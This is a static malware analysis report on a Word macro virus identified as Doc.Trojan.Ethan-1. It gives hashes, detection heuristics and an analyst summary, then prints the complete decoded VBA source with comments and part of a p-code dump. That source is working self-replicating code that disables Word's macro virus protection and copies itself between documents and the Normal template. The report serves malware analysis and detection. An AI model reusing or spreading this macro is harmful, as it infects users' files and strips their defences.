Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5356b94f523ec2f3…

MALICIOUS

Office (OLE)

35.0 KB Created: 1999-09-15 22:47:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1a0bac1ae10ae1be2a4cc8874f962e3e SHA-1: c27797114beefef813452ca229312d86e0fddd46 SHA-256: 5356b94f523ec2f3a18ab1aa11a6d73c631d506cabce9726d3cd3ef1b0513451
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE document containing VBA macros. The critical ClamAV heuristic indicates it is known malware (Doc.Trojan.Ethan-1). The VBA script runs from a Document_Close handler: it disables Word's macro virus protection setting (Options.VirusProtection = False), copies its own code into the Normal template when the template does not yet contain it, and copies the template's code back into any document that lacks it; it may also modify the document's summary information (Title, Author, Keywords) before saving the document over itself. The two-way copying of code between the active document and the Normal template, together with the potential modification of document summary information, indicates a sophisticated evasion or persistence mechanism.

Heuristics 2

  • ClamAV: Doc.Trojan.Ethan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6200 bytes
SHA-256: 1c75c0876b530d2ddef6fd14ebfdf266367bc56d5e313fa5ab50ee236b730d5d
Detection
ClamAV: Doc.Trojan.Ethan-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Module attributes of the extracted component. VB_Name shows the code lives in
' the document's "ThisDocument" class module, and VB_Base names the Normal
' template's ThisDocument as its base; VB_PredeclaredId/VB_Exposed are the
' standard attributes of such a document class module.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True






































' Event handler that fires when the document is closed. Analyst notes (no
' code changed): the routine copies the VBA source of the first component of
' ActiveDocument into the first component of NormalTemplate when the template
' lacks the marker string, and in the opposite direction when only the
' template carries it; it also turns off Word's virus-protection option and
' randomly rewrites the document summary information. Detection: writes to
' Options.VirusProtection, VBProject.VBComponents access from a document
' macro, and unexpected modifications of the Normal template are the
' observable indicators.
Private Sub Document_Close()
' Suppress every runtime error (e.g. if VBProject access is blocked), so the
' routine fails silently rather than raising a visible error.
On Error Resume Next
' Marker string searched for in both code modules to decide copy direction.
Const ID = "xyzzy"
' hdlskk: "save needed" flag; also reused to hold NormalTemplate.Saved below.
Dim hdlskk As Boolean
' ijnff: first VBComponent of the active document; iitgh: first VBComponent
' of the Normal template (note: ijnff is declared Variant, only iitgh As Object).
Dim ijnff, iitgh As Object
' Buffer for the full module source being copied.
Dim zmbbcxx As String
Set ijnff = ActiveDocument.VBProject.VBComponents.Item(1)
Set iitgh = NormalTemplate.VBProject.VBComponents.Item(1)
' Disables Word's built-in macro virus protection option (the macro warning
' on open) — a defence-evasion step, and a useful detection hook.
Options.VirusProtection = False
' Only act on documents saved as .doc or .dot formats.
If (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
' Direction 1: document carries the marker, template does not -> infect the
' Normal template with the document's module source.
If (iitgh.codemodule.Find(ID, 1, 1, 10000, 10000) = False) And (ijnff.codemodule.Find(ID, 1, 1, 10000, 10000) = True) Then
' Remember whether the template was already marked saved so it can be
' re-saved afterwards (presumably to keep its Saved state unchanged — inferred).
hdlskk = NormalTemplate.Saved
zmbbcxx = ijnff.codemodule.Lines(1, ijnff.codemodule.CountOfLines)
' Replace the template module's entire contents with the copied source.
iitgh.codemodule.deletelines 1, iitgh.codemodule.CountOfLines
iitgh.codemodule.AddFromString zmbbcxx
If hdlskk = True Then NormalTemplate.Save
End If
hdlskk = False
' Direction 2: template carries the marker, document does not -> overwrite the
' document's module with the template's source and flag the document for save.
If (iitgh.codemodule.Find(ID, 1, 1, 10000, 10000) = True) And (ijnff.codemodule.Find(ID, 1, 1, 10000, 10000) = False) Then
zmbbcxx = iitgh.codemodule.Lines(1, iitgh.codemodule.CountOfLines)
ijnff.codemodule.deletelines 1, ijnff.codemodule.CountOfLines
ijnff.codemodule.AddFromString zmbbcxx
hdlskk = True
End If
' With probability ~0.3, overwrite Title/Author/Keywords via the File Summary
' Info dialog and flag the document for save; the "Ethan Frome" title is the
' visible artefact behind the ClamAV family name.
If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Ethan Frome": .Author = "EW/LN/CB": .Keywords = "Ethan": .Execute: hdlskk = True: End With
' Persist the changes by saving the document over its own path, skipping
' names starting with "Document" (presumably unsaved new documents — inferred).
If (hdlskk = True) And Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/19619b8914c7479e8b997d62a9c94c5c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3407 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' 	FuncDefn (Private Sub Document_Close())
' Line #39:
' 	OnError (Resume Next) 
' Line #40:
' 	Dim (Const) 
' 	LitStr 0x0005 "xyzzy"
' 	VarDefn ID
' Line #41:
' 	Dim 
' 	VarDefn hdlskk (As Boolean)
' Line #42:
' 	Dim 
' 	VarDefn ijnff
' 	VarDefn iitgh (As Object)
' Line #43:
' 	Dim 
' 	VarDefn zmbbcxx (As String)
' Line #44:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ijnff 
' Line #45:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set iitgh 
' Line #46:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #47:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	Paren 
' 	IfBlock 
' Line #48:
' 	Ld ID 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x2710 
' 	LitDI2 0x2710 
' 	Ld iitgh 
' 	MemLd codemodule 
' 	ArgsMemLd Find 0x0005 
' 	LitVarSpecial (False)
' 	Eq 
' 	Paren 
' 	Ld ID 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x2710 
' 	LitDI2 0x2710 
' 	Ld ijnff 
' 	MemLd codemodule 
' 	ArgsMemLd Find 0x0005 
' 	LitVarSpecial (True)
' 	Eq 
' 	Paren 
' 	And 
' 	IfBlock 
' Line #49:
' 	Ld NormalTemplate 
' 	MemLd Saved 
' 	St hdlskk 
' Line #50:
' 	LitDI2 0x0001 
' 	Ld ijnff 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	Ld ijnff 
' 	MemLd codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	St zmbbcxx 
' Line #51:
' 	LitDI2 0x0001 
' 	Ld iitgh 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	Ld iitgh 
' 	MemLd codemodule 
' 	ArgsMemCall deletelines 0x0002 
' Line #52:
' 	
... (truncated)